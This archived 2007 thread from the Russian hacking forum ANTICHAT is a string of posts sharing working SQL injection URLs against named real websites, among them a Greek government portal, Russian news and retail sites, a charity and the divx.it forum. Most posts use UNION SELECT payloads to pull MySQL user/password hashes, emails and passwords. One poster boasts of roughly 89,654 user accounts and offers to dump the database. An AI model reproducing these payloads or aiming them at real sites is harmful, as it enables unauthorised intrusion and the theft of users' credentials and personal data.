ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

29.03.2007, 11:55
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Код:
http://www.my-tours.ru/calclient/biz_op.php?business_id=-1+union+select+1,2,concat(ecard_sname,char(58),ecard_sip,char(58),ecard_semail,char(58),ecard_rname,char(58),ecard_remail,char(58),card_image,char(58),ecard_heading,char(58),ecard_message,char(58),ecard_sig,char(58),card_template),4,5,6,7,8,9,10+from+card_user+limit+1,1/*
to ЛифчиС5СВ
Кто то скулю выкладывал там было за 100 колонок, а вообще смотри внимательнее мог не заметить, если к примеру вывод в тайтел.
|
|
|

29.03.2007, 12:08
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме: 2924346
Репутация:
1719
|
|
Сообщение от ЛифчиС5СВ
А кол-во столбцов может иметь неогранич кол-во? А то я тут 100 ужо проверил, но не подобрал.
order+by+xxx уже не в моде?
update:
Код:
http://news.qs.kiev.ua/lenta/news_full.php?id=56484+and+2=1+union+select+1,convert(concat(user,0x3a,password)+using+cp1251),3,4,5,6,7,8,9+from+mysql.user/*
Последний раз редактировалось n1†R0x; 29.03.2007 в 12:54..
|
|
|

29.03.2007, 13:09
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Код:
http://www.clasno.com/foto_pr.php?id=-1+union+select+1,2,3,4,convert(concat(database(),char(58),user(),char(58),version()),char),6,7,8/*
|
|
|

29.03.2007, 17:01
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме: 2132613
Репутация:
1365
|
|
www.reusablebags.com
http://www.reusablebags.com/news.php?id=-7+union+select+1,version(),database(),user(),5,6,7 ,8,9/*
|
|
|

29.03.2007, 17:07
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме: 631013
Репутация:
453
|
|
http://www.viking.tm/product.php?id=-1%20union%20select%201,2,3,4,5,6,7/*
И шоп какой-то
http://www.proaudio.ru/product.php?id=-7898%20union%20select%201,concat_ws(char(58),passw ord,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19%20from%20users/*
http://www.proaudio.ru/product.php?id=-7898%20union%20select%201,concat_ws(char(58),passw ord,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19%20from%20members/*
__  __
|
|
|

29.03.2007, 17:16
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме: 1604641
Репутация:
590
|
|
e-gov.gr
Код:
http://www.e-gov.gr/article.php?sid=-2818+union+select+1,2,3,4,concat(user,0x3a,password),6,7,8,9+from+mysql.user/*
Код:
http://www.armeniafund.org/press_releases/press_releases.php?id=-127%20UNION%20SELECT%201,user(),3,4,5,6,7/*
|
|
|

29.03.2007, 18:25
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Код:
http://www.ardisbook.ru/catalog/bookpodr.html?id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11/*
http://www.ardisbook.ru/catalog/bookpodr.html?id=-1+union+select+1,2,column_name,4,5,6,7,8,9,10,11+from+information_schema.columns+where+table_name=char(114,101,97,100,101,114,115)+limit+0,1/*
http://www.ardisbook.ru/catalog/bookpodr.html?id=-1+union+select+1,2,concat(readerid,char(58),readername,char(58),readerbiography),4,5,6,7,8,9,10,11+from+readers/*
|
|
|

29.03.2007, 18:35
|
|
Познающий
Регистрация: 27.02.2007
Сообщений: 89
Провел на форуме: 1141192
Репутация:
195
|
|
Вовремя работы наткулся случайно...мож кто захочет поковыряться..)
http://www.adrc.or.jp/nationframe.php?URL=./view_disaster_en.php&NationCode=392&lang=en&KEY=-1
http://lovefm.co.jp/contents/w_main3.php?oya_id=2'
|
|
|

29.03.2007, 20:10
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме: 2924346
Репутация:
1719
|
|
Код:
http://www.ruscico.com/detail.php?lang=ru&film=-1+union+select+1,2,3,4,5,concat(user,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50+from+mysql.user+limit+1,1/*
апдейт:
Код:
http://ostro.org/shownews_ks.php?id=-1+union+select+1,2,3,4,5/*
на таблицы не везет.. =\
Код:
http://www.fcdynamo.ru/info.php?id=-1'+union+select+concat_ws(0x3a,name,login,pass)+from+users+limit+2,1/*
вывода логина/пасса нет, мб таблица другая, мб еще что...
зато динамо))
Последний раз редактировалось n1†R0x; 29.03.2007 в 21:18..
|
|
|

29.03.2007, 21:54
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме: 5352530
Репутация:
2062
|
|
DivX.it
Код:
__http://www.divx.it/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58),user_icq,char(58),user_password),4,5,6,7,8,9%20from%20phpbb_users%20where%20user_id%3E89650%20and%20user_id%3C89654/*
более месяца держал эту скулю в привате, теперь могу выложить
89654 юзверей.
Постараюсь после дамп базы кинуть если кому надо
PS хе, только что посерфил в инете, их уже ломали, в статью углубляться не стал, возможно там чуть другая скуля __http://www.fssr.ru/hz.php?file=article&name=News&sid=6475
Последний раз редактировалось Thanat0z; 29.03.2007 в 22:11..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|